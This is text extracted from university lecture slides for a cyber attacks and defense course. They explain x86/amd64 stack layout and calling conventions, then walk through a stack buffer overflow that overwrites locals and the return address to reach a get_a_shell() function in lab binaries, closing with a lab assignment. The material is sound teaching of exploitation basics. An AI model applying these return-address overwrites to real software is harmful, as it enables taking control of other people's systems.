CS 519419 Cyber Attacks Defense Yeongjin Jang 100218
CS 519/419 Cyber Attacks & Defense Yeongjin Jang 10/02/18
Week 1 • Due: 10/02 2: 00 pm • Late submission due: 10/09 2: 00 pm (50% pts) • You will not get any point after this date
X 86 Stack • Stores local variables (negative access over ebp) • mov -0 x 8(%ebp), %eax • lea -0 x 24(%ebp), %eax • Stores function arguments from caller (positive access over ebp) • mov 0 x 8(%ebp), %eax • mov 0 xc(%ebp), %eax • Pushes function arguments to callee (positive access over the stack) • mov %eax, (%esp) • mov $0 x 4, 0 x 4(%esp)
Calling Convention • x 86 (32 bit) – pushes argument on the stack (for callee) • • • 0 x 4 * n (%esp) indicates n-th argument (%esp) – accessed by callee via 0 x 8(%ebp) 0 x 4(%esp) – accessed by callee via 0 xc(%ebp) 0 x 8(%esp) – accessed by callee via 0 x 10(%ebp) Why +8 at the %ebp’s side? • amd 64 (64 bit) – use registers to pass argument to callee • Register order (1 st, 2 nd, 3 rd, 4 th, 5 th, 6 th, etc. ) • %rdi, %rsi, %rdx, %rcx, %r 8, %r 9, … (use stack for more arguments) • Callee also uses these registers to get arguments
amd 64 Example • Printf() in x 86 lea mov mov mov call • Printf() in amd 64 0 x 8048727, %eax -0 x 8(%ebp), %ecx -0 xc(%ebp), %edx 1 st %eax, (%esp) %ecx, 0 x 4(%esp) 2 nd %edx, 0 x 8(%esp) 3 rd 0 x 8048370 <printf@plt> printf(0 x 8048727, ebp_8, ebp_c) movabs mov callq 1 st $0 x 400905, %rdi -0 x 8(%rbp), %rsi 2 nd -0 x 10(%rbp), %rdx 3 rd 0 x 400500 <printf@plt> printf(0 x 400905, ebp_8, ebp_10)
amd 64 Stack • Stores local variables (negative access over rbp) • mov -0 x 8(%rbp), %rax • lea -0 x 24(%rbp), %rax • Function arguments from caller does not use stack • mov %rdi, %rax • mov %rsi, %rax • Function arguments to callee does not use stack • mov %rax, %rdi • mov $0 x 4, %rsi • mov $0 x 40006, %rdx
MY_ARG 2 MY_ARG 1 Stack • Defines a variable scope of a function Return Addr %ebp • Local variables (negative index over ebp) • Arguments (positive index over ebp) • Function call arguments (positive index over esp) Saved EBP Local A ebp-8 Local B ebp-c Local C ebp-10 ARG 2 esp+4 ARG 1 esp • Return addr / Saved EBP? • Required for maintain a Stack %esp
%ebp Example – Function call Points to somewhere up… %esp • In bof-level 0, main() calls receive_input() • call 0 x 8048570 <receive_input> • Head of receive_input • • 0 x 08048570 0 x 08048571 0 x 08048573 0 x 08048574 <+0>: push <+1>: mov <+3>: push <+4>: sub %ebp %esp, %ebp %esi $0 x 54, %esp NO ARG…
%ebp Example – Function call Points to somewhere up… %esp • In bof-level 0, main() calls receive_input() • call 0 x 8048570 <receive_input> • Head of receive_input • • 0 x 08048570 0 x 08048571 0 x 08048573 0 x 08048574 <+0>: push <+1>: mov <+3>: push <+4>: sub %ebp %esp, %ebp %esi $0 x 54, %esp NO ARG…
%ebp Example – Function call Points to somewhere up… NO ARG… %esp • In bof-level 0, main() calls receive_input() • call 0 x 8048570 <receive_input> • Head of receive_input • • 0 x 08048570 0 x 08048571 0 x 08048573 0 x 08048574 <+0>: push <+1>: mov <+3>: push <+4>: sub %ebp %esp, %ebp %esi $0 x 54, %esp Call: push the address to return to the stack, then jump! Return Addr
%ebp Example – Function call Points to somewhere up… NO ARG… %esp • In bof-level 0, main() calls receive_input() • call 0 x 8048570 <receive_input> • Head of receive_input • • 0 x 08048570 0 x 08048571 0 x 08048573 0 x 08048574 <+0>: push <+1>: mov <+3>: push <+4>: sub %ebp %esp, %ebp %esi $0 x 54, %esp Return Addr
%ebp Points to somewhere up… NO ARG… Example – Function call • In bof-level 0, main() calls receive_input() • call Return Addr %esp 0 x 8048570 <receive_input> • Head of receive_input • • 0 x 08048570 0 x 08048571 0 x 08048573 0 x 08048574 <+0>: push <+1>: mov <+3>: push <+4>: sub %ebp %esp, %ebp %esi $0 x 54, %esp Saved EBP
%ebp Points to somewhere up… NO ARG… Example – Function call • In bof-level 0, main() calls receive_input() • call Return Addr %esp 0 x 8048570 <receive_input> • Head of receive_input • • 0 x 08048570 0 x 08048571 0 x 08048573 0 x 08048574 <+0>: push <+1>: mov <+3>: push <+4>: sub %ebp %esp, %ebp %esi $0 x 54, %esp Saved EBP
Points to somewhere up… NO ARG… Example – Function call • In bof-level 0, main() calls receive_input() • call Return Addr %ebp %esp 0 x 8048570 <receive_input> • Head of receive_input • • 0 x 08048570 0 x 08048571 0 x 08048573 0 x 08048574 <+0>: push <+1>: mov <+3>: push <+4>: sub %ebp %esp, %ebp %esi $0 x 54, %esp Saved EBP
Points to somewhere up… NO ARG… Example – Function call • In bof-level 0, main() calls receive_input() • call Return Addr %ebp %esp 0 x 8048570 <receive_input> • Head of receive_input • • 0 x 08048570 0 x 08048571 0 x 08048573 0 x 08048574 <+0>: push <+1>: mov <+3>: push <+4>: sub %ebp %esp, %ebp %esi $0 x 54, %esp Saved EBP
Points to somewhere up… NO ARG… Example – Function call • In bof-level 0, main() calls receive_input() • call 0 x 8048570 <receive_input> Return Addr %ebp %esp • Head of receive_input • • 0 x 08048570 0 x 08048571 0 x 08048573 0 x 08048574 <+0>: push <+1>: mov <+3>: push <+4>: sub %ebp %esp, %ebp %esi $0 x 54, %esp Saved EBP Saved ESI
Points to somewhere up… NO ARG… Example – Function call • In bof-level 0, main() calls receive_input() • call 0 x 8048570 <receive_input> Return Addr %ebp %esp • Head of receive_input • • 0 x 08048570 0 x 08048571 0 x 08048573 0 x 08048574 <+0>: push <+1>: mov <+3>: push <+4>: sub %ebp %esp, %ebp %esi $0 x 54, %esp Saved EBP Saved ESI
Points to somewhere up… NO ARG… Example – Function call • In bof-level 0, main() calls receive_input() • call Return Addr %ebp 0 x 8048570 <receive_input> • Head of receive_input • • 0 x 08048570 0 x 08048571 0 x 08048573 0 x 08048574 <+0>: push <+1>: mov <+3>: push <+4>: sub %ebp %esp, %ebp %esi $0 x 54, %esp Saved EBP Saved ESI
Points to somewhere up… NO ARG… Example – Function call • Call printf? movl $0 x 4141, -0 x 8(%ebp) movl $0 x 4242, -0 xc(%ebp) mov -0 x 8(%ebp), %ecx mov -0 xc(%ebp), %edx mov %eax, (%esp) mov %ecx, 0 x 4(%esp) mov %edx, 0 x 8(%esp) call 0 x 8048370 <printf@plt> Return Addr %ebp %esp Saved EBP Saved ESI
Points to somewhere up… NO ARG… Example – Function call • Call printf? movl $0 x 4141, -0 x 8(%ebp) movl $0 x 4242, -0 xc(%ebp) mov -0 x 8(%ebp), %ecx mov -0 xc(%ebp), %edx mov %eax, (%esp) mov %ecx, 0 x 4(%esp) mov %edx, 0 x 8(%esp) call 0 x 8048370 <printf@plt> Return Addr %ebp Saved EBP Saved ESI 0 x 4141 %esp
Points to somewhere up… NO ARG… Example – Function call • Call printf? movl $0 x 4141, -0 x 8(%ebp) movl $0 x 4242, -0 xc(%ebp) mov -0 x 8(%ebp), %ecx mov -0 xc(%ebp), %edx mov %eax, (%esp) mov %ecx, 0 x 4(%esp) mov %edx, 0 x 8(%esp) call 0 x 8048370 <printf@plt> Return Addr %ebp Saved EBP Saved ESI 0 x 4141 0 x 4242 %esp
Points to somewhere up… NO ARG… Example – Function call • Call printf? movl $0 x 4141, -0 x 8(%ebp) movl $0 x 4242, -0 xc(%ebp) mov -0 x 8(%ebp), %ecx mov -0 xc(%ebp), %edx mov %eax, (%esp) mov %ecx, 0 x 4(%esp) mov %edx, 0 x 8(%esp) call 0 x 8048370 <printf@plt> Return Addr %ebp Saved EBP Saved ESI 0 x 4141 0 x 4242 %esp ARG 1: 4141
Points to somewhere up… NO ARG… Example – Function call • Call printf? movl $0 x 4141, -0 x 8(%ebp) movl $0 x 4242, -0 xc(%ebp) mov -0 x 8(%ebp), %ecx mov -0 xc(%ebp), %edx mov %eax, (%esp) mov %ecx, 0 x 4(%esp) mov %edx, 0 x 8(%esp) call 0 x 8048370 <printf@plt> Return Addr %ebp Saved EBP Saved ESI 0 x 4141 0 x 4242 ARG 2: 4242 %esp ARG 1: 4141
Points to somewhere up… NO ARG… Example – Function call • Call printf? movl $0 x 4141, -0 x 8(%ebp) movl $0 x 4242, -0 xc(%ebp) mov -0 x 8(%ebp), %ecx mov -0 xc(%ebp), %edx mov %eax, (%esp) mov %ecx, 0 x 4(%esp) mov %edx, 0 x 8(%esp) call 0 x 8048370 <printf@plt> Return Addr %ebp Saved EBP Saved ESI 0 x 4141 0 x 4242 ARG 3: string. . ARG 2: 4242 %esp ARG 1: 4141
Points to somewhere up… Example – Function Return • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret %ebp NO ARG… Return Addr Saved EBP Saved ESI 0 x 4141 0 x 4242 ARG 3: string. . ARG 2: 4242 %esp ARG 1: 4141
Points to somewhere up… Example – Function Return • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret %ebp NO ARG… Return Addr Saved EBP Saved ESI 0 x 4141 0 x 4242 ARG 3: string. . ARG 2: 4242 %esp ARG 1: 4141
Points to somewhere up… Example – Function Return • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret %ebp %esp NO ARG… Return Addr Saved EBP Saved ESI 0 x 4141 0 x 4242 ARG 3: string. . ARG 2: 4242 ARG 1: 4141
Points to somewhere up… Example – Function Return • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret %ebp %esp NO ARG… Return Addr Saved EBP Saved ESI 0 x 4141 0 x 4242 ARG 3: string. . ARG 2: 4242 ARG 1: 4141
Points to somewhere up… Example – Function Return • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret %esp %ebp NO ARG… Return Addr Saved EBP Saved ESI 0 x 4141 0 x 4242 ARG 3: string. . ARG 2: 4242 ARG 1: 4141
Points to somewhere up… Example – Function Return • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret %esp %ebp NO ARG… Return Addr Saved EBP Saved ESI 0 x 4141 0 x 4242 ARG 3: string. . ARG 2: 4242 ARG 1: 4141
Points to somewhere up… %ebp Example – Function Return %esp • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret NO ARG… Return Addr Saved EBP Saved ESI 0 x 4141 0 x 4242 ARG 3: string. . ARG 2: 4242 ARG 1: 4141
Points to somewhere up… %ebp Example – Function Return %esp • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret NO ARG… Return Addr Saved EBP Saved ESI 0 x 4141 0 x 4242 ARG 3: string. . ARG 2: 4242 ret: pop %eip, change instruction ptr. . ARG 1: 4141
%ebp Points to somewhere up… Example – Function Return%esp • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret NO ARG… Return Addr Saved EBP Saved ESI 0 x 4141 0 x 4242 ARG 3: string. . ARG 2: 4242 ARG 1: 4141
%ebp Example – Function Return Points to somewhere up… %esp NO ARG… %ebp Points to somewhere up… %esp NO ARG… Return Addr Saved EBP Saved ESI 0 x 4141 0 x 4242 ARG 3: string. . ARG 2: 4242 ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow • Writing values over the variables • In the figure right, • -0 x 8(%ebp) stores 0 x 4141 • -0 xc(%ebp) stroes 0 x 4242 • -0 x 10(%ebp) is a buffer, size 4 byte. • Program gets input from you via Return Addr %ebp Saved EBP Saved ESI 0 x 4141 0 x 4242 Buffer at ebp-0 x 10 Buffer. . • fgets(buffer, 128, stdin); • Read 128 bytes. . • What if you type “ 1111 aaaabbbb”? %esp ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow • 4 byte buffer… • What if you type “ 1111 aaaabbbb”? Return Addr %ebp Saved EBP Saved ESI 0 x 4141 0 x 4242 Buffer at ebp-0 x 10 %esp Buffer. . ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow • 4 byte buffer… • What if you type “ 1111 aaaabbbb”? Return Addr %ebp Saved EBP Saved ESI 0 x 4141 0 x 4242 Buffer at ebp-0 x 10 %esp 0 x 3131 ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow • 4 byte buffer… • What if you type “ 1111 aaaabbbb”? Return Addr %ebp Saved EBP Saved ESI 0 x 4141 0 x 6161 Buffer at ebp-0 x 10 %esp 0 x 3131 ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow • 4 byte buffer… • What if you type “ 1111 aaaabbbb”? Return Addr %ebp Saved EBP Saved ESI 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 %esp 0 x 3131 ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow • 4 byte buffer… • What if you type “ 1111 aaaabbbb”? Return Addr %ebp Saved EBP Saved ESI 0 x 6262 0 x 6161 • You can change variables! Buffer at ebp-0 x 10 %esp 0 x 3131 ARG 1: 4141
Points to somewhere up… NO ARG… Return Address • Store the execution points after the call • 0 x 08048666 <+6>: • 0 x 0804866 b <+11>: Return Addr %ebp call 0 x 8048570 <receive_input> xor %eax, %eax Saved EBP Saved ESI 0 x 6262 0 x 6161 • Should store 0 x 804866 b on calling receive_input… Buffer at ebp-0 x 10 %esp 0 x 3131 ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow Return Addr %ebp • 4 byte buffer… • What if you type “ 1111 aaaabbbbccccddddeeee”? Saved EBP Saved ESI 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 %esp 0 x 3131 ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow Return Addr %ebp • 4 byte buffer… • What if you type “ 1111 aaaabbbbccccddddeeee”? Saved EBP 0 x 6363 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 %esp 0 x 3131 ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow Return Addr %ebp • 4 byte buffer… • What if you type “ 1111 aaaabbbbccccddddeeee”? 0 x 6464 0 x 6363 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 %esp 0 x 3131 ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow 0 x 6565 %ebp • 4 byte buffer… • What if you type “ 1111 aaaabbbbccccddddeeee”? 0 x 6464 0 x 6363 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 %esp 0 x 3131 ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow 0 x 6565 %ebp • 4 byte buffer… • What if you type “ 1111 aaaabbbbccccddddeeee”? • Overwrites the return address! 0 x 6464 0 x 6363 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 %esp 0 x 3131 ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow 0 x 6565 %ebp • 4 byte buffer… • What if you type “ 1111 aaaabbbbccccddddeeee”? • Overwrites the return address! 0 x 6464 0 x 6363 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 0 x 3131 • Can you set that as the address of • get_a_shell()? %esp ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow get_a_shell() %ebp • 4 byte buffer… • What if you type “ 1111 aaaabbbbccccddddeeee”? • Overwrites the return address! 0 x 6464 0 x 6363 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 0 x 3131 • Can you set that as the address of • get_a_shell()? %esp ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret get_a_shell() %ebp 0 x 6464 0 x 6363 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 %esp 0 x 3131 ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret get_a_shell() %ebp %esp 0 x 6464 0 x 6363 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 0 x 3131 ARG 1: 4141
Points to somewhere up… NO ARG… Buffer Overflow • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret get_a_shell() %esp %ebp 0 x 6464 0 x 6363 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 0 x 3131 ARG 1: 4141
Points to somewhere up… Buffer Overflow %ebp: 0 x 6464, INVALID %esp • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret NO ARG… get_a_shell() 0 x 6464 0 x 6363 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 0 x 3131 ARG 1: 4141
Points to somewhere up… Buffer Overflow • Function return of receive_input add $0 x 54, %esp pop %esi pop %ebp ret Run get_a_shell()! %ebp: 0 x 6464, INVALID %esp NO ARG… get_a_shell() 0 x 6464 0 x 6363 0 x 6262 0 x 6161 Buffer at ebp-0 x 10 0 x 3131 ARG 1: 4141
Assignment: Week-2 • Please solve challenges in the /home/labs/week 2 directory • Level 0 – change the value of local variables via BOF • Level 1 – the same as level 0 in amd 64 • Level 2 – change the return address to execute get_a_shell() • Level 3 – change the return address to execute get_a_shell(), 64 bit • Level 4 – Defeat a simple defense to return address overwriting • Will be five more released in Thursday • Due: 10/11 2: 00 pm
- Slides: 54